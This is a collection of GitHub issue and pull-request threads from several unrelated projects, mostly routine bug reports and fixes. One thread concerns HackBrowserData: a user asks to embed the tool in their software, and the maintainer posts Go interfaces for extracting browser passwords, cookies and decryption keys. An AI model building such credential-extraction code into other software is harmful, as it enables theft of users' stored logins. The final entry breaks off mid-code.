[2023-02-16T00:42:56Z DEBUG h2::proto::connection] Connection; peer=Client
[2023-02-16T00:42:56Z DEBUG tower::buffer::worker] service.ready=true message=processing request
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=WindowUpdate { stream_id: StreamId(0), size_increment: 5177345 }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Headers { stream_id: StreamId(1), flags: (0x4: END_HEADERS) }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Data { stream_id: StreamId(1) }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Data { stream_id: StreamId(1), flags: (0x1: END_STREAM) }
[2023-02-16T00:42:56Z DEBUG rustls::client::tls13] Ticket saved
[2023-02-16T00:42:56Z DEBUG rustls::client::tls13] Ticket saved
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Settings { flags: (0x0), header_table_size: 4096, max_concurrent_streams: 100, initial_window_size: 1048576, enable_connect_protocol: 0 }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Settings { flags: (0x1: ACK) }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=WindowUpdate { stream_id: StreamId(0), size_increment: 983041 }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Settings { flags: (0x1: ACK) }
[2023-02-16T00:42:56Z DEBUG h2::proto::settings] received settings ACK; applying Settings { flags: (0x0), enable_push: 0, initial_window_size: 2097152, max_frame_size: 16384 }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Headers { stream_id: StreamId(1), flags: (0x4: END_HEADERS) }
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Data { stream_id: StreamId(1) }
[2023-02-16T00:42:56Z DEBUG momento::preview::topics] received a heartbeat
Here's what happens (--verbose) now on a subscription timeout, regardless of whether something was published:
[2023-02-16T00:45:12Z DEBUG momento::preview::topics] received a heartbeat
[2023-02-16T00:46:12Z DEBUG h2::codec::framed_read] received frame=Reset { stream_id: StreamId(1), error_code: NO_ERROR }
[2023-02-16T00:46:12Z DEBUG tonic::codec::decode] decoder inner stream error: Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) }
[2023-02-16T00:46:12Z DEBUG momento::response::error] translating raw status to error: Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) }
The subscription ended: the request was interrupted by the server without an error
detail: TonicStatus(Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) })
Rebased for the restructure; it's a small enough PR that I just force pushed.
2025-04-01T06:39:39.565222
2019-11-15T21:10:31
523689781
{ "authors": [ "LCCarmody" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8669", "repo": "monarch-initiative/MAxO", "url": "https://github.com/monarch-initiative/MAxO/issues/118" }
gharchive/issue
Corneal transplant term questions
I am having difficulty finding specific definitions for, and differences between, some of these terms. It seems to me that some of them have overlapping meanings or are synonymous, but I haven't found a resource that defines all of them:
Corneal transplant
corneal patch graft
traditional, full thickness cornea transplant (also known as penetrating keratoplasty, or PK)
back layer cornea transplant (also known as endothelial keratoplasty, or EK)
Anterior lamellar keratoplasty (ALK)
@pnrobinson Do you know the difference?
Without more input or a use case, I'll just update a couple of synonyms and close.
2025-04-01T06:39:39.569310
2023-12-08T22:16:29
2033376709
{ "authors": [ "nicolevasilevsky", "sabrinatoro" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8670", "repo": "monarch-initiative/mondo", "url": "https://github.com/monarch-initiative/mondo/pull/7008" }
gharchive/pull-request
Add superclass to pregnancy loss, recurrent, 4
close #6867
@sabrinatoro I'm not totally certain about this. This superclass makes sense per Megan's suggestion (based on what is in the OMIM description), but it seems weird to have a disease that is both a susceptibility and a disease. It does seem to make sense in this case, though. I wonder if maybe we should remove the superclass 'fertility disorder'. It looks like I am the source, and obviously I am not an expert.
@nicolevasilevsky I agree that it is weird, but we have other examples of terms that are both diseases and susceptibilities. What is weird here is that the disease and the susceptibility are both for "pregnancy loss, recurrent". I would suggest that we keep both of these parents (susceptibility and disease), and that we review this in the context of a branch review, when we talk to experts.
2025-04-01T06:39:39.570387
2023-11-27T18:40:18
2012874119
{ "authors": [ "caufieldjh", "hannahblau" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8671", "repo": "monarch-initiative/ontogpt-experiments", "url": "https://github.com/monarch-initiative/ontogpt-experiments/pull/4" }
gharchive/pull-request
new maxo annotation example This is a new maxo annotation example for PMID 31078652, in a new subfolder under cases called hannah_manual_annotations. Thanks @hannahblau
2025-04-01T06:39:39.655288
2018-02-11T03:58:22
296158104
{ "authors": [ "chekalskiy", "frederikbosch", "sagikazarmark" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8672", "repo": "moneyphp/money", "url": "https://github.com/moneyphp/money/pull/460" }
gharchive/pull-request
Fix floating point casting to integer in PHP calculator Fixes #455 @chekalskiy can you please check if this solves the issue for you? Yup, it did. I'll check a bit later. Thank you I've tested and now my test case looks fine. 👍 But shouldn't we add castString() to the add(), subtract(), absolute() and mod() methods? No, as they don't involve casting float to string:

* add: adding two integers will result in an integer anyway
* subtract: subtracting one integer from another will result in an integer
* absolute: there is no calculation related to precision
* mod: there is no calculation related to precision

But I've just found other places where the tests break. I added a new test case for running all tests with a Russian UTF-8 locale for the PHP calculator. @frederikbosch see the separate commit with the breaking tests. Solution pushed in a separate commit. Merging this as it fixes the problem, but I'm going to do some refactoring around the number class. I feel that there is too much string casting here and there. Totally agree. In my perception, in version 4 we should use Number everywhere internally. That means only accepting Number or directly doing the conversion on every numeric parameter.
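For context, here is a minimal Python sketch of the failure class this PR guards against (illustrative only; the library itself is PHP, and the values shown assume IEEE-754 doubles):

    # Why casting a float result straight to int is unsafe for integer money amounts.
    amount = 4.10            # dollars, stored inexactly as a binary float
    cents = amount * 100     # floating-point multiply

    print(cents)             # 409.99999999999994
    print(int(cents))        # 409 -- plain truncation silently drops a cent

    # Routing through a string/decimal representation rounds correctly first,
    # which is the idea behind the calculator's castString() approach:
    from decimal import Decimal
    print(int(Decimal(str(amount)) * 100))  # 410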
2025-04-01T06:39:39.659077
2022-04-08T10:38:41
1197152589
{ "authors": [ "deby22", "florimondmanca", "mongkok" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8673", "repo": "mongkok/fastapi-debug-toolbar", "url": "https://github.com/mongkok/fastapi-debug-toolbar/issues/15" }
gharchive/issue
Ability to parse UUID https://github.com/mongkok/fastapi-debug-toolbar/blob/3552b0bbb8e1a86a4f5eaaf214e6916d52c941ef/debug_toolbar/panels/sql.py#L120-L121 Using a UUID field raises an exception:

    *** TypeError: Object of type UUID is not JSON serializable

I suggest adding UUID serialization by casting to str:

    if isinstance(obj, UUID):
        return str(obj)

Or allow setting an encoder on the json.dumps method. For anyone finding this issue, I bumped into the same situation and managed to find a workaround using FastAPI's jsonable_encoder:

    from debug_toolbar.panels.sqlalchemy import SQLAlchemyPanel as Base
    from fastapi.encoders import jsonable_encoder

    class SQLAlchemyPanel(Base):
        def after_execute(self, *args) -> None:  # type: ignore
            # HACK: base SQL panel calls json.dumps(parameters) at some point.
            # Ensure values such as UUIDs can be dumped.
            parameters = args[3]
            args = (*args[:3], jsonable_encoder(parameters), *args[4:])
            return super().after_execute(*args)

It can then be used by passing panels=["path.to.panels.SQLAlchemyPanel"]. Hey @deby22 , the issue is fixed using jsonable_encoder() as suggested by @florimondmanca , see #23 and v0.3.0.
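On the "allow setting an encoder on json.dumps" suggestion: a minimal, generic Python sketch of a custom encoder that handles UUIDs (standard library only; this is not the toolbar's actual code):

    import json
    import uuid

    class UUIDEncoder(json.JSONEncoder):
        # Fall back to str() for UUIDs; defer to the default behaviour otherwise.
        def default(self, obj):
            if isinstance(obj, uuid.UUID):
                return str(obj)
            return super().default(obj)

    params = {"id": uuid.uuid4(), "limit": 10}
    print(json.dumps(params, cls=UUIDEncoder))  # {"id": "3f2b...", "limit": 10}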
2025-04-01T06:39:39.663396
2024-06-21T06:25:40
2365813168
{ "authors": [ "hasaketa", "mongodben" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8674", "repo": "mongodb/chatbot", "url": "https://github.com/mongodb/chatbot/issues/441" }
gharchive/issue
Does not work with latest models It does not produce a response with the text-embedding-3-small and gpt-4o combination. Can you provide more information about the error that you're getting so we can help debug? As a first step, you can try to lower the minScore in the FindContentFunc. The .9 that we have as a default in the quick start works well for ada-02 but is often too high for text-embedding-3-small.

    const findContent = makeDefaultFindContent({
      embedder,
      store: embeddedContentStore,
      findNearestNeighborsOptions: {
        k: 5,
        path: "embedding",
        indexName: VECTOR_SEARCH_INDEX_NAME,
        // Start low to make sure all is working, and work your way up to a higher score if it suits.
        minScore: 0.1,
      },
    });

Followed your suggestion to lower the minScore to 0.1 and that worked. Thank you!
2025-04-01T06:39:39.688208
2021-09-07T16:08:42
990139724
{ "authors": [ "gssbzn" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8675", "repo": "mongodb/mongocli", "url": "https://github.com/mongodb/mongocli/pull/826" }
gharchive/pull-request
test: remove tests for deprecated command Proposed changes Remove tests for a deprecated command. These commands have been deprecated for a while and are starting to flake, so it's better to remove them. Checklist

[x] I have added tests that prove my fix is effective or that my feature works
[x] I have added any necessary documentation (if appropriate)
[x] I have updated e2e/E2E-TESTS.md (if a new command or e2e test has been added)
[x] I have run make fmt and formatted my code

is there an entry that needs to be removed/changed in E2E-TESTS.md as a result of this? Good call, I deleted the entries as we don't even document these commands any more. We should plan some time to start deleting some of the deprecated stuff.
2025-04-01T06:39:39.697223
2018-04-29T19:22:48
318742209
{ "authors": [ "Shad0wCore", "elwin013", "evanchooly" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8676", "repo": "mongodb/morphia", "url": "https://github.com/mongodb/morphia/issues/1244" }
gharchive/issue
Cannot insert a field with '.' ('dot') in field name Summary: Cannot insert any Map that contains a key with a '.' (dot) in it. Tested on Morphia 1.3.2. Steps to reproduce: Create a class containing a map, e.g.:

    class MyObjectWithMap {
        Map<String, String> map = Maps.newHashMap();
    }

Try to save the object:

    MyObjectWithMap obj = new MyObjectWithMap();
    obj.map.put("keyOk", "OK");
    getDs().save(obj); // Works well
    obj.map.put("key.notOK", "notOK");
    getDs().save(obj); // Throws exception

See result:

    java.lang.IllegalArgumentException: Invalid BSON field name key.notOK
    at org.bson.AbstractBsonWriter.writeName(AbstractBsonWriter.java:532)
    at com.mongodb.DBObjectCodec.encodeMap(DBObjectCodec.java:221)
    at com.mongodb.DBObjectCodec.writeValue(DBObjectCodec.java:198)
    at com.mongodb.DBObjectCodec.encode(DBObjectCodec.java:130)
    at com.mongodb.DBObjectCodec.encode(DBObjectCodec.java:61)
    at org.bson.codecs.BsonDocumentWrapperCodec.encode(BsonDocumentWrapperCodec.java:63)
    at org.bson.codecs.BsonDocumentWrapperCodec.encode(BsonDocumentWrapperCodec.java:29)
    at com.mongodb.operation.BulkWriteBatch$WriteRequestEncoder.encode(BulkWriteBatch.java:392)
    (... cut ...)

Additional info: The MongoDB docs ( https://docs.mongodb.com/manual/reference/limits/#Restrictions-on-Field-Names ) allow the "." char. Also, adding a document containing a field with "." from the Mongo shell works well. This is the same problem as #827, but this time MongoDB (at least from 3.6) allows using the "." char in field names. Updated the title and description to reflect reality - it is again about the "." (dot) char... Ran into the same issue right now. It's 2018 and neither MongoDB nor Morphia is able to store a darn dot in the key. 💢👿 😡 This complaint is actually coming from the driver and not Morphia. Morphia just passes the name down to the driver, which is rejecting the name. Consider filing a bug there. You might also try a new version of the Java driver and see if that behavior persists. @evanchooly You're right! Sorry for messing up and filing it here. Closing it and going to complain on the Mongo bug tracker. ;-) For everybody running into the same problem - there is an issue on the Mongo tracker: https://jira.mongodb.org/browse/JAVA-2810
2025-04-01T06:39:39.699786
2012-01-09T10:18:27
2767038
{ "authors": [ "danielemilan", "durran" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8677", "repo": "mongoid/mongoid", "url": "https://github.com/mongoid/mongoid/issues/1568" }
gharchive/issue
Mongoid support for non-rack applications I'm using Mongoid in a non-Rack application, and after updating to 2.4.0 I started receiving the error "Mongoid attempted to find the appropriate environment but no Rails.env, Sinatra::Base.environment, or RACK_ENV could be found" as soon as I load the configuration. Is Mongoid going to support only Rack-based applications? Sorry about that... Can you just use RACK_ENV for now and then I'll get this fixed for 2.4.1? How exactly are you determining what environment you are running under? I'm not determining it; I know it's a bare EventMachine... the app is not running within any external environment, it's self-contained.
2025-04-01T06:39:39.711945
2022-07-23T11:51:46
1315640699
{ "authors": [ "iammola", "vkarpov15" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8678", "repo": "mongoosejs/mongoose-lean-virtuals", "url": "https://github.com/mongoosejs/mongoose-lean-virtuals/issues/62" }
gharchive/issue
sub-document virtuals in nested arrays don't get attached when specified Do you want to request a feature or report a bug? Bug What is the current behaviour? The virtuals of sub-documents in nested arrays aren't attached to the result when I specify the virtual paths with { virtuals: [...] }. It works fine when I lean the query with { virtuals: true }. If the current behaviour is a bug, please provide the steps to reproduce.

    import assert from "node:assert";
    import mongoose from "mongoose";
    import { mongooseLeanVirtuals } from "mongoose-lean-virtuals";

    mongoose.plugin(mongooseLeanVirtuals);

    const NameSchema = new mongoose.Schema({
      first: { type: String, required: true },
      last: String,
    });

    NameSchema.virtual("full").get(function () {
      return `${this.first} ${this.last ?? ""}`.trim();
    });

    const ChildSchema = new mongoose.Schema({
      age: { type: Number, required: true },
      name: { type: NameSchema, required: true },
    }, { _id: false });

    const ParentModel = mongoose.model(
      "Parent",
      new mongoose.Schema({
        name: { type: NameSchema, required: true },
        child: ChildSchema,
        nested: new mongoose.Schema({
          children: [ChildSchema],
        }),
      })
    );

    async function run() {
      await mongoose.connect("...");

      await ParentModel.create({
        name: { first: "Homer", last: "Simpson" },
        child: { age: 10, name: { first: "Bart", last: "Simpson" } },
        nested: {
          children: [
            { age: 6, name: { first: "Lisa", last: "Simpson" } },
            { age: 3, name: { first: "Baby" } },
          ],
        },
      });

      const result = await ParentModel.find({})
        .populate("child")
        .populate("nested.children")
        .lean({
          virtuals: ["name.full", "child.name.full", "children.name.full"],
        });

      assert.equal(result.name.full, "Homer Simpson"); // Pass
      assert.equal(result.child.name.full, "Bart Simpson"); // Pass
      assert.equal(result.children[0].name.full, "Lisa Simpson"); // Fail
      assert.equal(result.children[1].name.full, "Baby"); // Fail
    }

    run().catch(console.error)

What is the expected behaviour? For the virtuals of the sub-documents in nested arrays to be attached. What are the versions of Node.js, mongoose-lean-getters, and Mongoose are you using? Note that "latest" is not a version.

    Package                Version
    mongoose               6.4.3
    mongoose-lean-getters  N/A
    Node.js                18.6.0

You need to specify nested.children.name.full. The script you provided fails, but the below script works:

    const mongoose = require('mongoose');
    const mongooseLeanVirtuals = require('mongoose-lean-virtuals');
    const assert = require('assert');

    mongoose.plugin(mongooseLeanVirtuals);

    const NameSchema = new mongoose.Schema({
      first: { type: String, required: true },
      last: String,
    });

    NameSchema.virtual("full").get(function () {
      return `${this.first} ${this.last ?? ""}`.trim();
    });

    const ChildSchema = new mongoose.Schema({
      age: { type: Number, required: true },
      name: { type: NameSchema, required: true },
    }, { _id: false });

    const ParentModel = mongoose.model(
      "Parent",
      new mongoose.Schema({
        name: { type: NameSchema, required: true },
        child: ChildSchema,
        nested: new mongoose.Schema({
          children: [ChildSchema],
        }),
      })
    );

    async function run() {
      await mongoose.connect("mongodb://localhost:27017/test");
      await mongoose.connection.dropDatabase();

      const { _id } = await ParentModel.create({
        name: { first: "Homer", last: "Simpson" },
        child: { age: 10, name: { first: "Bart", last: "Simpson" } },
        nested: {
          children: [
            { age: 6, name: { first: "Lisa", last: "Simpson" } },
            { age: 3, name: { first: "Baby" } },
          ],
        },
      });

      const result = await ParentModel.findById(_id)
        .populate("child")
        .populate("nested.children")
        .lean({
          virtuals: ["name.full", "child.name.full", "nested.children.name.full"], // <-- note the 'nested.'
        });

      assert.equal(result.name.full, "Homer Simpson"); // Pass
      assert.equal(result.child.name.full, "Bart Simpson"); // Pass
      assert.equal(result.nested.children[0].name.full, "Lisa Simpson"); // Pass
      assert.equal(result.nested.children[1].name.full, "Baby"); // Pass

      console.log('Done');
    }

    run().catch(console.error)

Also works fine if you remove the 'nested'. Hey @vkarpov15, forgive my invalid script. I'll try to explain my actual use case and give an excuse for why my script had errors. I have a model with 2 discriminator schemas applied to it. The ParentModel.child and ParentModel.nested... was meant to show the field I'm trying to populate between them. They both point to the same model; it just doesn't work with virtuals on the array of sub-documents. So I created a repro script to use here with populating the fields, and it didn't work. So I tried to check if it affected other schema definitions as well. That's why my original script has .populate("...") calls when the fields don't need it and the values aren't correctly checked. This is another script that I'm pretty sure will show my issue. Thanks again for putting up with me and for all your efforts across all the mongoose packages.

    import assert from "node:assert";
    import mongoose from "mongoose";
    import { mongooseLeanVirtuals } from "mongoose-lean-virtuals";

    async function run() {
      mongoose.plugin(mongooseLeanVirtuals);
      await mongoose.connect("...");

      const NameSchema = new mongoose.Schema({
        first: { type: String, required: true },
        last: String,
      });

      NameSchema.virtual("full").get(function () {
        return `${this.first} ${this.last ?? ""}`.trim();
      });

      const ChildModel = mongoose.model(
        "Child",
        new mongoose.Schema({
          age: { type: Number, required: true },
          name: { type: NameSchema, required: true },
        })
      );

      const ParentModel = mongoose.model(
        "Parent",
        new mongoose.Schema({
          name: { type: NameSchema, required: true },
          child: { type: mongoose.Types.ObjectId, ref: "Child" },
          nested: {
            type: [new mongoose.Schema({ item: { type: mongoose.Types.ObjectId, ref: "Child" } })],
          },
        })
      );

      const [child_1, child_2, child_3] = await ChildModel.create([
        { age: 10, name: { first: "Bart", last: "Simpson" } },
        { age: 6, name: { first: "Lisa", last: "Simpson" } },
        { age: 3, name: { first: "Baby" } },
      ]);

      await ParentModel.create({
        name: { first: "Homer", last: "Simpson" },
        child: child_1._id,
        nested: [{ item: child_3._id }, { item: child_2._id }],
      });

      const result = await ParentModel.findOne({})
        .populate("child")
        .populate("nested.item")
        .orFail(new Error("DOC!"))
        .lean({ virtuals: ["name.full", "child.name.full", "nested.item.name.full"] });

      assert.equal(result.name.full, "Homer Simpson"); // Pass
      assert.equal(result.child?.name.full, "Bart Simpson"); // Pass
      assert.equal(result.nested[0].item?.name.full, "Baby"); // Fail
      assert.equal(result.nested[1].item?.name.full, "Lisa Simpson"); // Fail
    }

    run();

Also, did you mean to close #36? The PR you linked didn't have an effect because you used the Fix keyword on #37 We took a closer look and this proves to be tricky to implement in general with how Mongoose populate works. Without hooking more closely into Mongoose populate, handling cases like discriminators isn't really feasible. However, there is a simple workaround:

    const result = await ParentModel.findOne({})
      .populate("child")
      .populate({ path: "nested.item", options: { lean: { virtuals: ['name.full'] } } }) // <-- add the `name.full` virtual here
      .orFail(new Error("DOC!"))
      .lean({ virtuals: ["name.full", "child.name.full"] }); // <-- instead of here
2025-04-01T06:39:39.719338
2022-05-14T23:30:58
1236142335
{ "authors": [ "monitoring-apps" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8680", "repo": "monitoring-apps/qc.app", "url": "https://github.com/monitoring-apps/qc.app/issues/72" }
gharchive/issue
⚠️ Quirk Club Argentina (API endpoint) has degraded performance In a8cb0e6, Quirk Club Argentina (API endpoint) (https://us-central1-quirkclub-dev.cloudfunctions.net/api/check/api) experienced degraded performance: HTTP code: 200 Response time: 7418 ms Resolved: Quirk Club Argentina (API endpoint) performance has improved in 62cf923.
2025-04-01T06:39:39.733664
2024-02-29T18:54:56
2161904450
{ "authors": [ "scala-steward" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8681", "repo": "monix/monix", "url": "https://github.com/monix/monix/pull/1817" }
gharchive/pull-request
Update silencer-plugin to 1.7.16 in series/4.x About this PR 📦 Updates com.github.ghik:silencer-plugin from 1.7.8 to 1.7.16 📜 GitHub Release Notes - Version Diff Usage ✅ Please merge! I'll automatically update this PR to resolve conflicts as long as you don't change it yourself. If you'd like to skip this version, you can just close this PR. If you have any feedback, just mention me in the comments below. Configure Scala Steward for your repository with a .scala-steward.conf file. Have a fantastic day writing Scala! ⚙ Adjust future updates Add this to your .scala-steward.conf file to ignore future updates of this dependency: updates.ignore = [ { groupId = "com.github.ghik", artifactId = "silencer-plugin" } ] Or, add this to slow down future updates of this dependency: dependencyOverrides = [{ pullRequests = { frequency = "30 days" }, dependency = { groupId = "com.github.ghik", artifactId = "silencer-plugin" } }] labels: library-update, early-semver-patch, semver-spec-patch, commit-count:1 Superseded by #1838.
2025-04-01T06:39:39.735774
2020-08-20T05:12:26
682416222
{ "authors": [ "kr-pawan", "xBATx" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8682", "repo": "monix/shade", "url": "https://github.com/monix/shade/issues/66" }
gharchive/issue
Usage with Scala version 2.13 When running with Scala 2.13 it fails with java.lang.ClassNotFoundException: scala.Serializable using monix shade version "io.monix" % "shade_2.12" % "1.10.0". But it works if we use Scala version 2.12. Do we have a way to use it with Scala 2.13, or does this library need to be compiled for 2.13? This'll add support for Scala 2.13 - https://github.com/monix/shade/pull/67
2025-04-01T06:39:39.746998
2019-11-06T16:04:44
518569918
{ "authors": [ "polar", "tritao" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8683", "repo": "mono/CppSharp", "url": "https://github.com/mono/CppSharp/issues/1260" }
gharchive/issue
Problem generating correct Entrypoint for method. I'm using templates on Linux, using the CLI.exe to generate C# and the correct -Symbols.cpp files. I added the following to the CppSharp.Generator#Setup(Driver) method:

    driver.Options.GenerateClassTemplates = true;

My simple class:

    #include <string>

    class Example {
    public:
        Example() {};
        void print(std::string &x);
    };

I use the following command:

    mono --debug ~/src/CppSharp/build/gmake/lib/Release_x64/CppSharp.CLI.exe -ax64 -o=build/cppsharp Example.hpp Example.cpp

The problem is that the following lines get generated in the cppsharp.cs file:

    [SuppressUnmanagedCodeSecurity]
    [DllImport("cppsharp", CallingConvention = global::System.Runtime.InteropServices.CallingConvention.Cdecl, EntryPoint="_ZN7Example5printERSs")]
    internal static extern void print(global::System.IntPtr __instance, global::System.IntPtr x);

The actual entry point to this function in the libcppsharp.so file is _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE. Changing the _ZN7Example5printERSs in the cppsharp.cs file to the above value rectifies this problem. Is there a way to get this entry point to generate correctly? @ddobrev Any idea about this? I imagine finding the mangled name has to be done by types somewhere. I imagine "RSs" means "Reference to Standard string", but as @ddobrev mentioned, std::string is defined as std::basic_string<char, std::allocator<char>> on all platforms. I added another std::string parameter:

    print(std::string &x, std::string &y);

and the corresponding mangled name is _ZN7Example5printERSsS0_, while the correct one is _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES6_. @polar If you run nm on the native library, does _ZN7Example5printERSsS0_ show up as a symbol? No, it does not.

    0000000000000e11 T Example_Example
    0000000000000e65 T Example__Example
    0000000000000e3e T Example_Example___1__S_Example
    0000000000000daa T _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES6_
    0000000000000f20 W _ZN7ExampleaSEOS_
    0000000000000f0e W _ZN7ExampleaSERKS_
    0000000000000f02 W _ZN7ExampleC1Ev
    0000000000000f02 W _ZN7ExampleC2Ev

I don't really know why. It seems that std::string is supposed to mangle to "Ss". Maybe I have a bad option in compiling these? I have compiled Example.cpp with c++, g++, and clang++ with absolutely no options, and I get the same complicated mangled name for print. Never mind. I needed "--c++11" in the flags, which got the proper ABI configured for the parser.
2025-04-01T06:39:39.750557
2020-02-11T17:56:10
563377984
{ "authors": [ "BenMcLean", "andreasbrostencab", "mscherotter" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8684", "repo": "mono/SkiaSharp", "url": "https://github.com/mono/SkiaSharp/issues/1139" }
gharchive/issue
[FEATURE] Adding metadata properties to JPEG images when using SKPixmap.Encode() Is your feature request related to a problem? Please describe. JPEG images and other image file types can have additional metadata properties that can enhance how the picture is interpreted by renderers. An example is the "/xmp/{wstr=http://ns.google.com/photos/1.0/panorama/}:ProjectionType" = "equirectangular" property which identifies an image as a 360 panoramic projection image. You can easily use the exiftool app https://exiftool.org/gui/ to add the metadata but I need to add it in the code of my app. Describe the solution you'd like Add a dictionary property to SKJpegEncoderOptions to enable setting metadata properties when encoding JPEG images. Describe alternatives you've considered None known. Additional context Any thoughts around this? PNG format has metadata as well which should be writable.
2025-04-01T06:39:39.794542
2015-09-26T05:26:40
108441641
{ "authors": [ "monstrenyatko" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8685", "repo": "monstrenyatko/butler-xbee-gateway", "url": "https://github.com/monstrenyatko/butler-xbee-gateway/issues/10" }
gharchive/issue
Unexpected start of next frame The connection between the XBee client and the TCP server is not stable. Before the TCP connection drops, the warning "unexpected start of next frame" is printed. Byte processing is fixed. The end of the frame will not be missed anymore.
2025-04-01T06:39:39.798054
2015-09-10T17:59:25
105864000
{ "authors": [ "carloscallahuayapa", "dpaloucva", "hitteshahuja", "jleyva" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8686", "repo": "moodlehq/moodlemobile2", "url": "https://github.com/moodlehq/moodlemobile2/issues/217" }
gharchive/issue
ReferenceError cordova is not defined Tried to follow the instructions given here: https://docs.moodle.org/dev/Setting_up_your_development_environment_for_Moodle_Mobile_2 but I keep getting "cordova is not defined" when trying to connect to Moodle. Hi, we've identified this error and we've opened an issue to fix it: https://tracker.moodle.org/browse/MOBILE-1219 Thanks, Dani Hello, I tried to follow the instructions, but I have this problem, please help me. Thanks :) Closing this issue, please follow up in the tracker
2025-04-01T06:39:39.815619
2020-07-17T20:33:54
659615570
{ "authors": [ "Dontmindmes", "moonD4rk" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8687", "repo": "moonD4rk/HackBrowserData", "url": "https://github.com/moonD4rk/HackBrowserData/issues/18" }
gharchive/issue
Package implement? Hey, could you implement a package system so we can use this program in our software?

    chrome, err := Recovery(browser, "text.json", history, password, cookie)

ok, I would add this feature today or tomorrow. Thank you, would it be possible to make it so you can choose only the Windows functions so the build is smaller? @Dontmindmes compiling for Windows only seems impossible! And this tool is best used as a command-line tool. I've added two new interface structs. The functions in these two interfaces will hopefully help you to use them in your own projects.

    type Browser interface {
        InitSecretKey() error
        GetName() string
        GetSecretKey() []byte
        GetAllItems(itemName string) ([]common.Item, error)
    }

    type Item interface {
        ChromeParse(key []byte) error
        FirefoxParse() error
        OutPut(format, browser, dir string) error
        CopyItem() error
        Release() error
    }
2025-04-01T06:39:39.862515
2017-07-19T20:16:13
244160864
{ "authors": [ "moorepants" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8689", "repo": "moorepants/resonance", "url": "https://github.com/moorepants/resonance/issues/1" }
gharchive/issue
Project name Some words to play with:

* learning
* education
* resonance
* engineering
* computation
* frequency
* vibration
* oscillation
* damping
* natural frequency
* phase shift
* degree of freedom
* mass spring damper
* mode shape
* mode
* eigen*
* stability

Going with resonance.
2025-04-01T06:39:39.868556
2023-11-13T19:58:18
1991380358
{ "authors": [ "adamdecaf", "codecov-commenter" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8691", "repo": "moov-io/watchman", "url": "https://github.com/moov-io/watchman/pull/511" }
gharchive/pull-request
Reduce Jaro term proximity We can roughly assume terms should match within a few positions relative to each other. Queries should contain as many terms as possible and ideally would have rough ordering similar to indexed terms. Codecov Report Merging #511 (53d1fd2) into master (766a672) will decrease coverage by 0.01%. Report is 1 commit behind head on master. The diff coverage is 0.00%. :exclamation: Current head 53d1fd2 differs from pull request most recent head 489fc9e. Consider uploading reports for the commit 489fc9e to get more accurate results :exclamation: Your organization needs to install the Codecov GitHub app to enable full functionality. Additional details and impacted files

    @@            Coverage Diff            @@
    ##           master     #511      +/-   ##
    =========================================
    - Coverage    8.27%     8.26%   -0.01%
    =========================================
      Files          44        44
      Lines        3492      3496       +4
    =========================================
      Hits          289       289
    - Misses       3180      3184       +4
      Partials       23        23
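To make the idea concrete, here is a small Python sketch of position-limited term matching (illustrative only; watchman itself is written in Go, and term_sim below is a stand-in for its Jaro scoring):

    from difflib import SequenceMatcher

    def term_sim(a, b):
        # Stand-in for Jaro/Jaro-Winkler; any string similarity in [0, 1] works.
        return SequenceMatcher(None, a, b).ratio()

    def proximity_score(query_terms, indexed_terms, window=2):
        # Average best similarity per query term, only considering indexed
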